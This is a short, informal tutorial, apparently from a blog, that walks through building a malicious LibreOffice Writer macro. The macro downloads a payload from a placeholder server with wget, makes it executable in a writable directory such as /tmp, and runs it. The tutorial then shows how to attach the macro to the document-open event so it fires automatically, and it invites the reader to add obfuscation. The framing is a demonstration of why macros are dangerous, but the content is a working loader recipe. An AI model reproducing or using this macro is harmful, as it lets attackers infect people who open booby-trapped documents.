So, we all know it's stupid to open a document with unknown macros right..?. Today we're gonna have some fun with malicious macros in Libreoffice writer, just to show the concept of malware loaders in Libreoffice macros, so come on in and have a bit of fun :)
The first thing we need, is a document, so open one, and go to the macro editor. Next, make a macro like this one
REM ***** BASIC *****
#Wait needs to happen, wait for the download before chmod and execute
Sub Main
Shell "bash -c 'wget https://PAYLOAD_SERVER_IP/PAYLOAD_FILE --no-check-certificate -O /DOWNLOAD_DIR/PAYLOAD_FILE'"
wait 10000
Shell "bash -c 'chmod +x /DOWNLOAD_DIR/PAYLOAD_FILE'"
Shell "bash -c '/DOWNLOAD_DIR/PAYLOAD_FILE &'"
End SubSave the macro and close the macro editor. Now, the next part we need is to make it execute when we open the document, and we do that by going to
1) select the main menu "Tools:Customize..."
2) in the dialog that pops up, select the tab "Events"
3) There you can attach your macro to the "Document loading finished" event
( or "Open Document" , "Activate Document" , .. )
Save the document and try to open it, it should work, and load the payload file. Now, remember that the download location and user rights have to fit, so find a place in the target system you have read, write and execute in, normally this would be /tmp for a good starting point.
yes, I know, it's pretty lame, but as a concept for showing why not to enable macros, it works wonders. And obfuscation is left as something for the reader to do :)
Have fun :)